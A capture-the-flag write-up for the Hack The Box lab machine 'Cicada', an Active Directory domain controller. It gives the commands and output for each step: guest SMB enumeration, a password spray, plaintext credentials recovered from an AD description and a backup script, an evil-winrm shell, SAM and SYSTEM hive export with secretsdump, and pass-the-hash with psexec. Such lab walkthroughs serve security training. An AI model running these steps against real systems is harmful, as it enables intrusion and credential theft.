HTB:Cicada
HTB:Cicada
Intro
Cicada is a great example of an introductory Windows Active Directory box that shows how simple enumeration can lead to major wins.
The TL;DR:
- We enumerate an open SMB share and find a “new hire” welcome message that contains a default password.
- We brute force RIDs to obtain a list of domain users. A password spray with the default password reveals a user who never changed it.
- With valid credentials we enumerate further and discover another password stored in Active Directory metadata.
- That user has access to a different SMB share which contains a backup script with plaintext credentials.
- Testing those credentials against WinRM provides us with an interactive shell.
- Checking privileges shows the account has
SeBackupPrivilegeenabled.- We use this to export the registry hives, dump the local SAM hashes, and pass the hash to authenticate as Administrator.
Recon
Nmap first look
Start with a service-detection scan:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
sudo nmap -sVC 10.129.231.149
..snip..
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-01 09:00:22Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: 2025-10-01T09:01:50+00:00; +7h01m30s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-10-01T09:01:52+00:00; +7h01m30s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-10-01T09:01:50+00:00; +7h01m30s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: 2025-10-01T09:01:52+00:00; +7h01m30s from scanner time.
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-10-01T09:01:10
|_ start_date: N/A
|_clock-skew: mean: 7h01m29s, deviation: 0s, median: 7h01m29s
Key findings:
 cicada.htb shows up on many ports, as well as the hostname CICADA-DC.  I’ll add these to my /etc/hosts file:
1
10.129.231.149 CICADA-DC cicada.htb CICADA-DC.cicada.htb
- Presence of AD-specific services (Kerberos on 88, LDAP/GC on 389/3268/636/3269, SMB, DNS, RPC) plus hostname all point to a DC.
- Scan shows a significant clock skew (~+7h) which can break Kerberos operations if not accounted for.
SMB - TCP 445: the low-hanging fruit
Given a DC with SMB open, I tried anonymous/guest access.
Anonymous attempt:
1
2
3
4
nxc smb 10.129.231.149 -u '' -p '' --shares
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\:
SMB 10.129.231.149 445 CICADA-DC [-] Error enumerating shares: STATUS_ACCESS_DENIED
Guest attempt succeeded:
1
2
3
4
5
6
7
8
9
10
11
12
13
nxc smb 10.129.231.149 -u 'Guest' -p '' --shares
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\Guest:
SMB 10.129.231.149 445 CICADA-DC [*] Enumerated shares
SMB 10.129.231.149 445 CICADA-DC Share Permissions Remark
SMB 10.129.231.149 445 CICADA-DC ----- ----------- ------
SMB 10.129.231.149 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.129.231.149 445 CICADA-DC C$ Default share
SMB 10.129.231.149 445 CICADA-DC DEV
SMB 10.129.231.149 445 CICADA-DC HR READ
SMB 10.129.231.149 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.129.231.149 445 CICADA-DC NETLOGON Logon server share
SMB 10.129.231.149 445 CICADA-DC SYSVOL Logon server share
ADMIN$, C$, IPC$ are standard on a windows host NETLOGON, SYSVOL are standard on a DC. HR, DEV are non-standard.
As we only have access to HR, I pulled the share with smbclient -N //10.129.231.149/HR and found Notice from HR.txt. The file reads:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada Corp
I’ll note the password:
Cicada$M6Corpb*@Lp#nZp!8
Now we just need to pair this up with a username.
Finding usernames via RID brute force
Using an RID-brute, I extracted domain accounts:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
nxc smb 10.129.231.149 -u 'Guest' -p '' --rid-brute
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\Guest:
SMB 10.129.231.149 445 CICADA-DC 498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 500: CICADA\Administrator (SidTypeUser)
SMB 10.129.231.149 445 CICADA-DC 501: CICADA\Guest (SidTypeUser)
SMB 10.129.231.149 445 CICADA-DC 502: CICADA\krbtgt (SidTypeUser)
SMB 10.129.231.149 445 CICADA-DC 512: CICADA\Domain Admins (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 513: CICADA\Domain Users (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 514: CICADA\Domain Guests (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 515: CICADA\Domain Computers (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 516: CICADA\Domain Controllers (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 517: CICADA\Cert Publishers (SidTypeAlias)
SMB 10.129.231.149 445 CICADA-DC 518: CICADA\Schema Admins (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 519: CICADA\Enterprise Admins (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 525: CICADA\Protected Users (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 526: CICADA\Key Admins (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.231.149 445 CICADA-DC 571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.231.149 445 CICADA-DC 572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.231.149 445 CICADA-DC 1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB 10.129.231.149 445 CICADA-DC 1101: CICADA\DnsAdmins (SidTypeAlias)
SMB 10.129.231.149 445 CICADA-DC 1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 1103: CICADA\Groups (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser)
SMB 10.129.231.149 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser)
SMB 10.129.231.149 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser)
SMB 10.129.231.149 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser)
SMB 10.129.231.149 445 CICADA-DC 1109: CICADA\Dev Support (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser)
I cleaned the output to get a usable list of usernames for testing.
1
2
3
4
5
6
7
8
9
Administrator
Guest
krbtgt
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars
Password spraying
I sprayed the discovered password against the user list:
1
2
3
4
5
6
7
8
9
nxc smb 10.129.231.149 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.231.149 445 CICADA-DC [-] cicada.htb\Administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.231.149 445 CICADA-DC [-] cicada.htb\Guest:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.231.149 445 CICADA-DC [-] cicada.htb\krbtgt:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.231.149 445 CICADA-DC [-] cicada.htb\CICADA-DC$:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.231.149 445 CICADA-DC [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.231.149 445 CICADA-DC [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
Credential found: michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8.
Logging in as Michael didn’t immediately give anything interesting (shares same as Guest). So I continued enumerating users via SMB:
1
2
3
4
5
6
7
8
9
10
11
12
nxc smb 10.129.231.149 -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users 41s 10:55:35
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.129.231.149 445 CICADA-DC -Username- -Last PW Set- -BadPW- -Description-
SMB 10.129.231.149 445 CICADA-DC Administrator 2024-08-26 20:08:03 1 Built-in account for administering the computer/domain
SMB 10.129.231.149 445 CICADA-DC Guest 2024-08-28 17:26:56 1 Built-in account for guest access to the computer/domain
SMB 10.129.231.149 445 CICADA-DC krbtgt 2024-03-14 11:14:10 1 Key Distribution Center Service Account
SMB 10.129.231.149 445 CICADA-DC john.smoulder 2024-03-14 12:17:29 1
SMB 10.129.231.149 445 CICADA-DC sarah.dantelia 2024-03-14 12:17:29 1
SMB 10.129.231.149 445 CICADA-DC michael.wrightson 2024-03-14 12:17:29 0
SMB 10.129.231.149 445 CICADA-DC david.orelious 2024-03-14 12:17:29 0 Just in case I forget my password is aRt$Lp#7t*VQ!3
SMB 10.129.231.149 445 CICADA-DC emily.oscars 2024-08-22 21:20:17 0
I discovered that david.orelious had a password written in his AD description field:
1
Just in case I forget my password is aRt$Lp#7t*VQ!3
Using leaked password and escalating access to a higher-priv user
With david.orelious’s password I enumerated shares
1
2
3
4
5
6
7
8
9
10
11
12
13
nxc smb 10.129.231.149 -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB 10.129.231.149 445 CICADA-DC [*] Enumerated shares
SMB 10.129.231.149 445 CICADA-DC Share Permissions Remark
SMB 10.129.231.149 445 CICADA-DC ----- ----------- ------
SMB 10.129.231.149 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.129.231.149 445 CICADA-DC C$ Default share
SMB 10.129.231.149 445 CICADA-DC DEV READ
SMB 10.129.231.149 445 CICADA-DC HR READ
SMB 10.129.231.149 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.129.231.149 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.129.231.149 445 CICADA-DC SYSVOL READ Logon server share
I found the DEV share readable, and discovered a PowerShell backup script:
Backup_script.ps1 reads:
1
2
3
4
5
6
7
8
9
10
11
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
We now have emily.oscars:Q!3@Lp#M6b*7t*Vt in plaintext.
What the shell?
Emily’s credentials stand out:
- The PowerShell backup script contains Emily’s username and password in plaintext.
- Credentials found in scripts are often used by services or accounts with broader privileges. That makes the account worth testing across services (SMB, WinRM, RDP, etc.) for possible interactive access, while remembering it may be a non-interactive/service account in some environments.
Interactive access: WinRM
Testing Emily’s credentials for interactive access:
1
2
3
nxc winrm 10.129.231.149 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
WINRM 10.129.231.149 5985 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
WINRM 10.129.231.149 5985 CICADA-DC [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt (Pwn3d!)
I used evil-winrm to get an interactive shell:
1
2
evil-winrm -i 10.129.231.149 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
PS C:\Users\emily.oscars.CICADA\Documents>
Checking token privileges with whoami /priv revealed:
1
2
3
4
5
6
7
8
9
10
11
12
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeBackupPrivilege is the important one here. if we can enable and use it we can save registry hives and extract local SAM hashes.
From SeBackupPrivilege to SYSTEM
I followed the common SeBackupPrivilege → dump SAM trick:
Export registry hives:
1
2
cmd /c "reg save HKLM\SAM SAM & reg save HKLM\SYSTEM SYSTEM"
# Both files saved successfully in current directory
Download the saved SAM and SYSTEM files via the WinRM session (Evil-WinRM has download).
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> ls
Directory: C:\Users\emily.oscars.CICADA\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/1/2025 3:38 AM 49152 SAM
-a---- 10/1/2025 3:38 AM 18558976 SYSTEM
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download SAM
Info: Downloading C:\Users\emily.oscars.CICADA\Documents\SAM to SAM
Info: Download successful!
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download SYSTEM
Info: Downloading C:\Users\emily.oscars.CICADA\Documents\SYSTEM to SYSTEM
Info: Download successful!
On my machine, use Impacket secretsdump.py to extract the local account hashes:
1
2
3
4
5
6
7
8
9
10
secretsdump.py -sam SAM -system SYSTEM LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesnt have hash information
Pass-the-hash / remote service exec with Impacket psexec.py:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
psexec.py Administrator@10.129.231.149 -hashes ":2b87e7c93a3e8a0ea4a581937016f341"
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Requesting shares on 10.129.231.149.....
[*] Found writable share ADMIN$
[*] Uploading file lDzxdAoT.exe
[*] Opening SVCManager on 10.129.231.149.....
[*] Creating service lfkC on 10.129.231.149.....
[*] Starting service lfkC.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.2700]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>
From that shell I could read the root flag:
1
2
type C:\Users\Administrator\Desktop\root.txt
b77facd8************************
This post is licensed under CC BY 4.0 by the author.